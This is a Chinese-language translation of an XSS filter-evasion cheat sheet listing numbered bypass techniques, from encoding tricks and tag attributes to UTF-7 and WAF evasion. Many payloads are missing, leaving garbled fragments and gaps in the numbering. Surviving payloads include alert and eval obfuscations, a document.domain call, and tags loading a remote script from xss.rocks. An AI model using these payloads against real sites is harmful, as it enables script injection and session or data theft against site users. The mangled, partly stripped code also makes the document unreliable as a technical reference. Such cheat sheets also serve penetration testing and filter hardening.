以下是一些具体的XSS绕过过滤的方法:
在大多数存在漏洞的地方,插入以下代码将弹出含有“XSS”字样的对话框。建议使用URL编码器对整个代码进行编码。
小贴士:如果想快速检查页面,可以插入“<任意文本>”,然后观察页面输出是否有明显变化,以判断是否存在漏洞。
以下为具体代码实现:
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–>”>’>2.简短的XSS定位器若页面空间有限且无JavaScript漏洞,以下简短的字符串可用于快速检测XSS注入。注入后查看页面源代码,检查是否出现”;!–”=&{()}3.无过滤绕过这是一个标准的XSS注入代码,通常会被防御,但建议先测试一下。
6.无分号无引号不使用分号和引号的XSS攻击示例:
7.不区分大小写的XSS攻击向量XSS攻击向量,不区分JavaScript函数的大小写:
8.HTML实体使用HTML实体进行XSS攻击,需要分号以生效:
9.重音符混淆当需要在JavaScript代码中同时使用单引号和双引号时,可使用重音符(`)包含代码:
21.内嵌TAB使用TAB字符分隔XSS攻击代码,适用于某些解析环境:
22.内嵌编码后的TAB使用编码后的TAB字符分隔XSS攻击代码:
23.内嵌换行分隔XSS攻击代码利用换行字符分隔代码,仅特定字符有效:
24.内嵌回车分隔XSS攻击代码使用回车字符分隔,注意字符长度:
25.使用空字符分隔JavaScript指令空字符也可以用作XSS攻击,需要特殊工具或编码:
perl-e‘print“”;’>out26.利用IMG标签中JavaScript指令前的空格和元字符如果过滤器不计算“javascript:”前的空格,这种方法将有效:
27.利用非字母非数字字符某些浏览器的HTML解析器认为非字母非数字字符作为空白或无效符号,而XSS过滤器可能未考虑此情况:
<29.未闭合的script标签在某些浏览器中,未闭合的标签会被自动闭合,这为XSS提供了机会:
31.只含左尖括号的HTML/JavaScriptXSS向量在某些浏览器中,不需要闭合标签的右尖括号就可以执行XSS攻击:
\”;alert(‘XSS’);//34.闭合title标签通过闭合title标签进行XSS攻击:
35.INPUTimage利用输入类型为image的INPUT标签执行XSS:
36.BODYimage在BODY标签的BACKGROUND属性中插入XSS代码:
37.IMGDynsrc通过IMG标签的DYNSRC属性实施XSS攻击:
38.IMGlowsrc利用IMG标签的LOWSRC属性进行XSS注入:
39.List-style-image通过样式属性中的list-style-image进行XSS攻击,仅在特定浏览器环境下有效:
- XSS40.图片中引用VBscript利用VBScript在IMG标签中执行XSS:
41.Livescript(仅限旧版本Netscape)在老版本的Netscape浏览器中,通过Livescript执行XSS:
42.SVG对象标签使用SVG标签触发XSS攻击:
Set.constructor`alert\x28document.domain\x29```44.BODY标签通过BODY标签的事件处理器实现XSS攻击,无需"javascript:"前缀:
45.事件处理程序XSS攻击可以利用多种HTML事件,以下是部分事件列表:
利用BGSOUND标签在某些浏览器中实现XSS:
47.&JavaScript包含使用&字符和JavaScript结合构造XSS攻击:
48.样式表利用LINK标签的HREF属性指向JavaScript进行XSS注入:
49.远程样式表利用远程样式表插入XSS代码,特定环境下有效:
54.STYLE属性中使用注释分隔表达式利用注释分隔的方式在IMG标签的STYLE属性中插入XSS代码:
55.含表达式的IMGSTYLE将XSS代码嵌入到IMG标签的STYLE属性中,适用于IE环境:
exp/*56.STYLE标签(仅旧版本Netscape可用)在旧版本Netscape浏览器中,使用STYLE标签执行JavaScript代码:
alert('XSS');57.使用背景图像的STYLE标签利用STYLE标签设置背景图像为JavaScript代码:
58.使用背景的STYLE标签通过BODY标签的STYLE属性设置背景图像执行JavaScript代码:
BODY{background:url("javascript:alert('XSS')")}59.含STYLE属性的HTML任意标签在任意HTML标签的STYLE属性中嵌入JavaScript代码,适用于IE环境:
60.本地htc文件通过本地htc文件执行XSS代码,需要与XSS攻击向量在相同服务器上:
61.US-ASCII编码使用US-ASCII编码执行XSS攻击,适用于使用该编码的服务器环境:
scriptalert(¢XSS¢)/script62.META标签使用META标签进行页面刷新并执行JavaScript代码:
63.使用数据的META通过META标签和dataURLscheme实现XSS攻击,不包含可见的SCRIPT单词或JavaScript指令:
64.含有额外URL参数的META通过在META标签中包含额外的URL参数绕过URL检查:
66.基于事件的IFRAME利用事件触发器在IFRAME标签中执行XSS代码:
67.FRAME与IFRAME类似,FRAME标签也可用于XSS攻击:
68.TABLE通过TABLE标签的BACKGROUND属性插入XSS代码:
69.TD利用TD标签的BACKGROUND属性进行XSS攻击:
70.DIV背景图像在DIV标签的STYLE属性中设置背景图像为JavaScript代码:71.含有UnicodeXSS利用代码的DIV背景图像使用Unicode字符对URL参数进行混淆,以实现XSS攻击:
72.含有额外字符的DIV背景图像在DIV标签中利用额外字符实现XSS攻击:
73.DIV表达式利用DIV标签的STYLE属性中的表达式实现XSS攻击:
74.HTML条件注释块利用HTML条件注释在特定浏览器中执行XSS代码:
75.BASE标签使用BASE标签改变页面的基本URL,以实施XSS攻击:
76.OBJECT标签利用OBJECT标签加载含有XSS代码的外部资源:
78.使用EMBEDSVG包含攻击向量在特定浏览器下,使用EMBED标签加载SVG代码实现XSS攻击:
79.在FLASH中使用ActionScript混淆XSS攻击向量利用FLASH文件中的ActionScript代码进行混淆,以绕过过滤器:
a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);80.CDATA混淆的XML数据岛在特定环境下,利用XML数据岛和CDATA混淆实现XSS攻击:
cript:alert('XSS')">81.使用XML数据岛生成含内嵌JavaScript的本地XML文件通过本地XML文件包含JavaScript代码实施XSS攻击:
82.XML中使用HTML+TIME利用HTML+TIME扩展在XML中嵌入JavaScript代码:
alert("XSS")">83.使用一些字符绕过".js"过滤通过改名将JavaScript文件伪装成图像文件,以绕过过滤器:alert("XSS")');>86.嵌入命令的IMAGE利用IMAGE标签在密码保护页面上执行命令,适用于管理员权限环境:
alert('XSS')">89.UTF-7编码在页面未指定编码或浏览器设置为UTF-7编码时,可以利用UTF-7执行XSS攻击:
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-90.利用HTML引号包含的XSS在某些浏览器中,可以通过特定的引号使用方式绕过XSS过滤器:"SRC="httx://xss.rocks/xss.js">"SRC="httx://xss.rocks/xss.js">'>"SRC="httx://xss.rocks/xss.js">91.URL字符绕过使用不同的编码和格式化方式绕过URL过滤:
<%3C<<...等等...93.绕过WAF的方法利用特定技巧绕过Web应用程序防火墙(WAF),包括存储型XSS、基于DOM的XSS、请求重定向等多种方法:
...更多示例...94.存储型XSS如果XSS代码已经绕过了输入过滤并存储在服务器上,WAF可能无法在输出时阻止它。
示例:在脚本中使用setTimeout函数,根据GET参数动态设置延时。
96.基于DOM的XSS示例:在脚本中直接执行GET参数的内容。
97.通过请求重定向构造XSS示例:在服务器端脚本中,基于用户输入构造重定向。
header('Location:'.$_GET['param']);98.利用不过滤特定字符串的WAF有些WAF可能不会过滤某些特定的字符串或脚本结构,可以利用这一点构造XSS攻击。
